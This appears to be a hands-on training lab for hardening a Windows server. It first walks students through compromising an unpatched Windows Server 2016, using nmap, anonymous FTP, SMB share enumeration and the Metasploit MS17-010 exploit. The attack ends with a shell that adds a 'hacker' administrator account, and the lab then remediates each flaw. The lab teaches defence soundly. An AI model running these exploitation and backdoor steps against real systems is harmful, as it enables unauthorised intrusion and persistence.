InfoSecLab: Hardening

profileDcook-tulane.edu
hardening-windows.html
Home>Computer Science homework help>InfoSecLab: Hardening
Skip to main content

Hardening Windows

Download Instructions

Before You Begin

IF YOU HAVE ANY ISSUE ACCESSING OR DOING THE LAB, REFER TO BELOW TROUBLESHOOTING TECHNIQUES.
Chrome is the supported browser and should be used.  There is a known issue with Firefox that will cause double typing.

LINK YOUR ACCOUNT TO YOUR INSTRUCTOR

  1. Navigate to the Home Screen, where you will see all of your labs.

image001_3.jpg

  1. Click on the “Link Course to Instructor” button.

image002_1.jpg

  1. From the “Course” drop down menu, select the set of labs you want to link to an instructor.  Type your instructor’s email in the box, and click “Link to Instructor”.

image003_0.jpg

  1. Repeat this step if you are linking multiple sets of labs.
  2. If you would like to change the instructor linked to a set of labs, simply click the “Remove” button and repeat Step #2.

image004_1.jpg

How to use our labs

 

Browsers

Infosec learning supports Google Chrome. There are many complex functions that occur behind the scenes in our virtual environment and we want to make sure you have the best possible experience. Using Google Chrome as the browser will ensure this. Below is a link to download it.

Google Chrome Download

Starting the Environment

Every lab is different and you should familiarize yourself with it first. By clicking the "Start" button we begin creating your virtual environment. While this is happening you can begin looking through any of the information in this pane.  

Once your environment is started, the actual virtual machines (VM) might need another few minutes to finish starting up. You can think about starting our environment just like starting any computer in person, it takes a few minutes to fully power on.
Everything is HTML 5

Our entire environment is built in HTML 5 and doesn't require any plugins, Phewww!!! You will notice the left hand side of the screen has an information panel that can be moved in and out to make the content larger or smaller. In fact, it can actually be closed to make the virtual topology on the right as large as possible.

Clicking on a VM in the Topology

When asked to access a specific VM in the network topology on the right hand side of the screen, click on the needed VM and a window will pop up with that computer's desktop. Again, make sure you give the VMs time to fully start up.

How our Design Helps You

In each of our lab manuals there are a few things that you should keep in mind which will help you navigate through the labs.

  1. Every action such as click, right-click, drag, open, etc., are in bold type.
  2. Any time you have to type something (such as a command) we have highlighted the code in this font.

Common Problems

  1. I can't see my mouse.

Are you using Google Chrome? If not, there are known issues with Firefox where the mouse continues to disappear. Once Firefox fixes this issue, we will all be much happier! In the mean time you should download Google Chrome. We have also found that moving your mouse around quickly, many times brings the mouse back.

  1. The lab is broken because I can't get it to work.

Although the lab environments are computers, we are human and sometimes mistakes happen. With that said, 9 out of 10 times we find something is being typed wrong or a step was missed by the user. Make sure you are typing exactly what you are supposed to type. Even the slightest error will cause a command not to work.

  1. Is there a Help Desk?

Yes! Our help desk is here to provide you with technical support to make sure you can access your labs. What they can't do is take anything away from your instructor by answering questions about the content. With one click you can create a ticket with the help desk. The Help Desk section is located at the end of every lab. It is always helpful to include a screenshot with any issue.

  1. I am completely stuck and I can't find what I did wrong.​

At the end of each lab there is a Help Desk Section, where you can submit a ticket.  Once a ticket is submitted, we will perform the lab from front to back to assure it is working as it should, and report back to you.  If the lab is not working, we will escalate the ticket to the engineering team to fix any problems.  The labs can be tricky at times and each time you start a lab, the steps must be performed front to back for all sections.

  1. My Windows VM is saying there are updates.

Microsoft will periodically push updates and you might see a message regarding these updates. It's okay to disregard the message by closing the update window and completing the lab.

Introduction

Objective: 

Securing an operating system is critical to a company or organization’s IT infrastructure. Learning how to secure Windows is extremely important because of the wide use of the operating system within companies, organizations, and homes. Learning the best practices for updating and securing Microsoft Windows is critical to protecting an organization’s assets.

Overview: 

In this lab, you will take a Microsoft Windows system that has security-related issues and patch it. Security-related issues can include items such as default usernames and passwords, clear text protocols like FTP and Telnet, and poorly configured web services. When Windows systems, which are huge targets of attackers due to their wide use in the industry, are not secured properly, they can be compromised which could lead to data leakage as well as costly remediation. The Windows operating system initially had a very poor reputation for security, but over the years, Microsoft has worked hard to overcome this reputation, and the newer versions of Windows on the market are known for much more robust security.

Key Term Description
Kali Linux An Advanced Penetration Testing Linux distribution designed for digital forensics and penetration testing, ethical hacking, and network security assessments.
Anonymous FTP Allows a user to connect to an FTP site without an account and upload or download files.
Metasploit A framework that contains exploits for various information systems.
nmap A port scanner which will indicate whether ports are open or closed on a remote system.
Vulnerability A weakness in code that can be exploited.

Hardening Windows

  1. Click on the Kali VM in the topology and log in to with the username and password below.
Operating Systems Username Password
Linux root toor
Note: The password of toor will not be displayed when you type it for security purposes.

image001.png

Exploitation

In order to have a full understanding of why you need to secure systems, it is a good idea to see what the results can be if someone fails to patch a system. In the first section of the lab, we will exploit Windows Server 2016 with a vulnerability that is classified as severe (which means it can do a large amount of damage).

  1. Open the terminal on Linux by clicking on the command prompt shortcut in the taskbar.

image002_0.png

  1. Type the following command to view your IP address on Linux. Press Enter.

root@kali:~# ifconfig eth0

Note: Your IP address is 192.168.1.50.

image003.png

Challenge # Challenge #

Challenge #

What is the number of flags equal to in this ifconfig output? Incorrect. Please try again. Answer Submit Skip
  1. Type the following command to ping the Windows Server. Press Enter.

root@kali:~# ping 192.168.1.100 -c 4 image004.png

Challenge # Challenge #

Challenge #

What is the TTL value when you ping this remote Windows Server? Incorrect. Please try again. Answer Submit Skip
  1. Type the following command to scan the Windows Server. Press Enter.

root@kali:~# nmap 192.168.1.100

image005.png

Challenge # Challenge #

Challenge #

What is the version of nmap installed on Kali (format X.XX)? Incorrect. Please try again. Answer Submit Skip

The goal of this lab is to harden Windows. The first thing that we see when perform a port scan is that port 21 is open. FTP sends credentials in a plain text which is a serious security issue. Another issue with FTP site is they sometimes allow anonymous access and allow those anonymous users to download or upload files. If anonymous users can store files on a server, that can be a liability for the company if something is stored there that should not be. We will now test the FTP server to see if anonymous access is allowed and if file upload and download is allowed.

  1. Type the following command to create a fake mp3 file. Press Enter.

root@kali:~# echo this is not a real mp3 file > 8675309.mp3

image006.png

  1. Type the following command to connect to the ftp server. Press Enter. After connecting, log in as the Name ftp (which can be used in place of anonymous). For the password, type ftp or password or just press Enter. Any credentials will be accepted if anonymous access is allowed.

root@kali:~# ftp 192.168.1.100

Note: The password will not be displayed when you type it for security purposes.

image007.png

  1. Type the following at the FTP prompt. Press Enter.

ftp>ls

ftp> get flag.txt

ftp> put 8675309.mp3

ftp> byeimage008.png

  1. Type the following command to view the flag. Press Enter.

root@kali~:# cat flag.txt

image009.png

Challenge # Challenge #

Challenge #

What is the 6 digit flag code? Incorrect. Please try again. Answer Submit Skip

In the next step, we will rescan the server:

  1. Type the following command to scan the Windows Server. Press Enter.

root@kali:~# nmap 192.168.1.100

image005.png

We also see that HTTP is open by the list of other ports. Most people use HTTPS now. We will now test to see if the website is functioning for company purposes or has not been setup.

  1. Click on the Windows Key and then select Web Browser.

image010.png

  1. In the URL bar, type http://192.168.1.100. Press Enter.

image011.png

Challenge # Challenge #

Challenge #

What color shirt is the person who is alone wearing on this web page? Incorrect. Please try again. Answer Submit Skip Note: This is the default web page for Internet Information Services and has not been configured. Close the browser.

In the next step, we will rescan the server:

  1. Type the following command to scan the Windows Server. Press Enter.

root@kali:~# nmap 192.168.1.100

image005.png

We also see that File and Print Sharing is open by the list of other ports.

  1. Type the following command to enumerate the shares. Press Enter.

root@kali:~# smbclient -L \\192.168.1.100

image012.png

Just press Enter when you are asked for the password.

Challenge # Challenge #

Challenge #

What is the comment for the C$ share? Incorrect. Please try again. Answer Submit Skip
  1. Click on the Windows Key and then select Web Browser.

image010.png

  1. In the URL bar, type https://www.google.com.

image013.png

  1. Search for SMB Exploit Windows Server 2016.

image014.png

Challenge # Challenge #

Challenge #

What is the name of the exploit that comes up (format MSXX-XXX)? Incorrect. Please try again. Answer Submit Skip

Close the browser.

  1. Type the following command to initialize the database for Metasploit. Press Enter.

root@kali:~# msfdb init

image015.png

Challenge # Challenge #

Challenge #

What is the name of the database user created (format xxx)? Incorrect. Please try again. Answer Submit Skip
  1. Type the following command to start Metasploit. Press Enter.  The picture you see might look different.

root@kali:~# msfconsole

image016.png

  1. Type the following command to search for the MS17-010 exploit. Press Enter.

msf5 > search MS17-010

image017.png

  1. Type the following command to select the MS17-010 exploit. Press Enter.

msf5 > use exploit/windows/smb/ms17_010_psexec

image018.png

  1. Type the following command to get the relevant information about MS17-010. Press Enter.

msf5 exploit(windows/smb/ms17_010_psexec) > info

image019.png

  1. The next step will be critical to our remediation later. Scroll down to the bottom of the info and right-click the first reference and select Open Link.​

image020.png

  1. Some Windows systems that have not been patched, secured, and hardened will have a critical vulnerability in this case.

image021.png

  1. Switch back to the msf5 menu in Metasploit.
  2. Type the following command to set the remote host to 192.168.1.100. Press Enter.

msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.1.100

  1. Type the following command to check if the system is vulnerable to MS17-010. Press Enter.

msf5 exploit(windows/smb/ms17_010_psexec) > check

  1. Type the following command to exploit the system with MS17-010 vulnerability. Press Enter.

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

  1. If you do not receive the results below with a meterpreter prompt, type exploit again. Press Enter.

image022.png

  1. Type the following command to get a command prompt. Press Enter.

meterpreter > shell

image023.png

Challenge # Challenge #

Challenge #

What is the version of Windows reported (format XX.X.XXXXX)? Incorrect. Please try again. Answer Submit Skip
  1. Type the following command to add an account. Press Enter.

C:\Windows\system32>net user hacker P@ssw0rd /add

image024.png

  1. Type the following command to add the account to the administrators group. Press Enter.

C:\Windows\system32>net localgroup administrators hacker /add

image025.png

  1. Type exit twice to remove the connection to the command prompt and to the victim. Press Enter.

image026.png

Summary

In this section, you scanned a remote system for open ports. You were able to discover that an FTP site was allowing anonymous access and download and store content on the site. FTP is in plain text, so its use should be avoided. Then, you discovered a web server using HTTP instead of HTTPS. The website was in the default state and had not been configured at all. Finally, you were able to enumerate the shares on a remote server without a username and password. And, with a MS17-010 exploit, you were able to exploit Windows Server and then created a user “hacker” and added that user to the administrators group.

Discussion Questions: 

  1. What is Metasploit?
  2. What does the msfconsole command do?
  3. What does the msfdb init command do?
  4. How do you get information about an exploit?
  5. What is MS17-010?

Hardening

  1. Click the Windows Server icon from the topology.  Click the Send Ctrl+Alt+Delete button and then log in to the Windows Server with the username of Administrator and the password of P@ssw0rd.
Note: The password of P@ssw0rd will not be displayed when you type it for security purposes.

image027.png

NOTE: If you see a notification about Networks, click Yes.
  1. The Server Manager will appear.

image028.png

  1. Click Manage. Click Remove Roles and Features. Click Next. Click Next

image029.png

  1. At the Remove Server Roles Screen, examine the Web Server Roles by clicking the down arrow.

image030.png

  1. Click the box in front of the Web Server so the box turns from black to white. This will remove all of the Web Server (IIS) Roles. Click Next. Click Next. Click Remove.

image031.png

  1. View the Feature removal progress. Click Close when finished.  This will take a few minutes.

image032.png

  1. Right-click the Windows Key. Click Shut down or sign out and click Restart.

image033.png

  1. Select Hardware: Maintenance (Unplanned) and click Continue.

image034.png

  1. Click the Send Ctrl+Alt+Delete button and then log in to the Windows Server with the username of Administrator and the password of P@ssw0rd.
Note: The password of P@ssw0rd will not be displayed when you type it for security purposes.

image027.png

  1. Go back and click on Kali from the topology. Within the msf5 subprompt, type the following command. Press Enter.

msf5 exploit(windows/smb/ms17_010_psexec) > nmap 192.168.1.100

image035.png

You have now removed FTP and the anonymous FTP site and removed the default web server that was not set up or being used. The system is starting to be much more secure, but there is still the matter of the SMB vulnerability as well as the ability to browse shares without authentication.

  1. Switch back to the Windows Server and open the command prompt by double-clicking on the shortcut to the desktop.

  2. Type the following command to check the status of the guest account. Press Enter.

C:\>net user guest

image036.png

  1. Type the following command to set the status of the guest account. Press Enter.

C:\>net user guest /active:no

image037.png

  1. Type the following command to check the status of the guest account. Press Enter.

C:\>net user guest

image038.png

Note: The account is no longer active.
  1. Switch back to the Kali machine and type the following command. Press Enter when you are asked for the password. Notice that you are no longer able to enumerate the shares.

msf5 exploit(windows/smb/ms17_010_psexec) > smbclient -L \\192.168.1.100

image039.png

Note: Not only does disabling the guest account prevent the uncredentialed enumeration of shares, it also prevents the exploit. This is an important lesson on why some simple best practices can at times be the difference between a secure and compromised system.
  1. Type the following command and press Enter.

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

image040.png

Challenge # Challenge #

Challenge #

What is the number value for Command (format XXX)? Incorrect. Please try again. Answer Submit Skip
  1. Switch back to Windows. In the command prompt, type the following command to view the administrative accounts on the system. Press Enter.

C:\>net localgroup administrators

image041.png

  1. The hacker account should not be on this system. Type the below command and press Enter.

C:\>net user hacker /active:no

image042.png

Note: Press the STOP button to complete the lab.

Summary

There are hardening tasks that should be performed on systems, such as:

  • Disabling the guest account
  • Using encrypted protocols instead of clear text ones
  • Disabling anonymous access
  • Disabling unauthenticated share enumeration
  • Windows updates
  • Removing websites with default configurations
  • Viewing administrative accounts
  • Removing unauthorized accounts

As you saw in the first section, systems that are not hardening can cause a heap of trouble for a company or organization. This can lead to a compromise which can hurt a company’s reputation or damage them financially. Securing and hardening systems is paramount in this day of information warfare.

Discussion Questions: 

  1. How do you remove Internet Information Services?
  2. How do you check for administrator accounts at the command line?
  3. How do you deactivate the guest account from the command line?
  4. How do you check to see if an account is active from the command line?
  5. After removing FTP and HTTP, and rebooting, what is a final step you can take to prove they are removed?

Help Desk

The Infosec Help Desk is available to help with technical issues.  If you have a technical issue, just click the help desk button below and we will investigate.

Create Help Desk Ticket First Name * Last Name Email * Lab Lab Section * Step Number * Describe Issue * Screenshot Upload Submit Back Next View Lab Instructions Start We are doing a ton of things behind the scenes setting up your environment, this might take up to 5 minutes. Your session is about to expire. Extend × Time remaining: Stop +15 minutes Are you sure you want to stop?

Hardening Windows

Your session has ended.

Please wait...

Your session is currently being stopped.

Please wait...

Your challenge lab will begin shortly. It appears you already have a lab running. Would you like to stop all existing labs and start this lab?